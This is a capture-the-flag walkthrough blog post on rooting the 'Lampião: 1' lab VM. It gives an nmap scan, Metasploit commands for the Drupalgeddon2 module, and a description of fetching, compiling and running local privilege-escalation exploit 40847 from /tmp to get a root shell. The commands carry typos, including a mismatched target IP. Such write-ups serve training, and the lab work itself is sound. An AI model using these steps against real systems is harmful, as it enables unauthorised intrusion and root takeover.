Hack the Lampião: 1 (CTF Challenge)


Hello friends!! Today we are going to solve another CTF challenge “Lampião: 1”. This VM is developed by Tiago Tavares, which is a standard Boot-to-Root challenge. Our goal is to get into the root directory and see the congratulatory message.
Level: Easy
Task: To Find The Final Flag.
Let’s Breach!!
The target holds 192.168.1.105 as network IP; now using nmap lets find out open ports.
nmap –p- -A 192.168.1.105




Nmap scan shows us port 22, 80, 1898 are open, so we thought of opening the IP address along with the port 1898 in our browser. It also gave us a clue about the webpage that it has drupal running on it.




From the previous clue we thought of exploiting it by using exploit drupal_drupalgeddon2.
msf > user explot/unix/webapp/drupal_drupalgeddon2
 msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.105
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit
Booyeah!! We have got the meterpreter, therefore we thought of checking the some description about Victim’s Machine by using command:
Lsb_release -a
The description gave us a very strong hint from the Version Number of the Victim’s Machine for our Next Step.




After a long search using the earlier clue about the Version Number, We have finally found the exploit that we were looking for and we have downloaded it on our machine.




Side by Side we have executed a python server which will help us to download the exploit over Victim’s Machine.




We have download this file on server’s /tmp (universal writeable) directory. Since the exploit is in .cpp format therefore to compile and execute it, there were specific commands given in the code of the exploit. This gave us a hint on how to compile and execute the exploit 40847.ccp.
Boom, we got the root shell! Let’s read the flag now.
cd /root
ls
cat flag.txt


0 comments:

Post a Comment